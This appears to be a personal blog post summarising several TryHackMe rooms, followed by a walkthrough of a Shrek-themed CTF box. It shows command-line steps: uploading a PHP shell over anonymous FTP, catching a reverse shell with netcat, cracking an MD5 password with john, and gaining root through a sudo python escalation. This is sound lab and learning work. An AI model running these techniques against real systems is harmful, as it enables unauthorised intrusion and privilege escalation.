I was away for a few days with just an old laptop setup with Kali as the OS. It didn’t have enough grunt to run any VMs, so it was THM only. Since there wasn’t much new I went and did a few older CTFs that I hadn’t done before:

  1. Pickle Rick. I tried to watch one episode of Rick and Morty once and was like meh and turned it off; why is this fandom so annoying? Anyway, nothing really new to report from this.
  2. Biohazard. This was an older Resident Evil themed CTF and it was super CTF. But it was okay, just a bit annoying to do with a barely functional touchpad and no mouse.
  3. I’d already done Juicy Details but it was just reading logs and answering questions, no big deal.
  4. Volatility. This was actually interesting. However Volaltility is no longer in the Kali repo and installing it is a pain is the ass, and the room doesn’t tell you how to do it. May do some more in this field. It’s a bit like the Autopsy thing; maybe it’s just because it’s novel but I found it interesting.

Then I got home and tried to do HackathonCTF: 2 from VulnHub but the stupid thing wouldn’t get an IP address either as bridged or NAT. Deleted.

Next, I tried,711/. It took like 10 minutes.


HTTP, SSH and FTP. Let’s begin with FTP.


We have anonymous login with upload, and the directory contains a HTML file. HMMMMMMM WONDER WHAT THAT MEANS?

└─# ftp 
Connected to
220 ProFTPD Server (ProFTPD Default Installation) []
Name ( anonymous
331 Anonymous login ok, send your complete email address as your password
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 .
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 ..
-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
226 Transfer complete
ftp> get CALL.html
local: CALL.html remote: CALL.html
200 PORT command successful
150 Opening BINARY mode data connection for CALL.html (109 bytes)
226 Transfer complete
109 bytes received in 0.00 secs (44.4077 kB/s)
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful
150 Opening BINARY mode data connection for test.txt
226 Transfer complete
5 bytes sent in 0.00 secs (68.7720 kB/s)
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful
150 Opening BINARY mode data connection for shell.php
226 Transfer complete
5495 bytes sent in 0.00 secs (134.3703 MB/s)

And where did our shell go?

└─# cat CALL.html           
        <h1>GET READY TO RECEIVE A CALL</h1>
└─# python3 /opt/dirsearch/ -u               
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10848
Error Log: /opt/dirsearch/logs/errors-21-06-24_07-35-13.log
Output File: /opt/dirsearch/reports/
[07:35:13] Starting: 
# 403s removed
[07:35:22] 301 -  312B  - /files  ->                           [07:35:22] 200 -    1KB - /files/         
[07:35:23] 200 -   11KB - /index.html                                                     [07:35:27] 403 -  277B  - /server-status/                                                 [07:35:27] 403 -  277B  - /server-status

Task Completed                                 

Start a listener and go to

└─# nc -nvlp 1234       
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 49574
Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 08:37:20 up 5 min,  0 users,  load average: 0.14, 0.09, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ sudo -l
sudo: no tty present and no askpass program specified
$ which python
$ which python3
$ python3 -c 'import pty;pty.spawn("/bin/bash");'


www-data@ubuntu:/home$ ls -lash
ls -lash
total 16K
4.0K drwxr-xr-x  3 root  root  4.0K Nov 26  2020 .
4.0K drwxr-xr-x 23 root  root  4.0K Nov 26  2020 ..
4.0K -rw-r--r--  1 root  root    43 Nov 26  2020 important.txt
4.0K drwxr-xr-x  4 shrek shrek 4.0K Jun 15 13:34 shrek
www-data@ubuntu:/home$ cat im
cat important.txt 
run the script to see the data


Run a random script in a CTF without checking the contents? Erm, no thanks.

www-data@ubuntu:/$ cat
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'

# guff removed


Uh huh.

└─# john hash -w=/usr/share/wordlists/rockyou.txt  --format=Raw-MD5 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
onion            (?)
1g 0:00:00:00 DONE (2021-06-24 07:39) 50.00g/s 3302Kp/s 3302Kc/s 3302KC/s panteraroz..jorie
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

Now what?

www-data@ubuntu:/$ su shrek
su shrek
Password: onion

shrek@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass,

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
shrek@ubuntu:/$ sudo -u root /usr/bin/python3.5 -c 'import os;os.system("/bin/bash")'
<t /usr/bin/python3.5 -c 'import os;os.system("/bin/bash")'                  
root@ubuntu:/# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Thu Jun 24 08:39:36 -03 2021

Almost took longer to write this than to do it.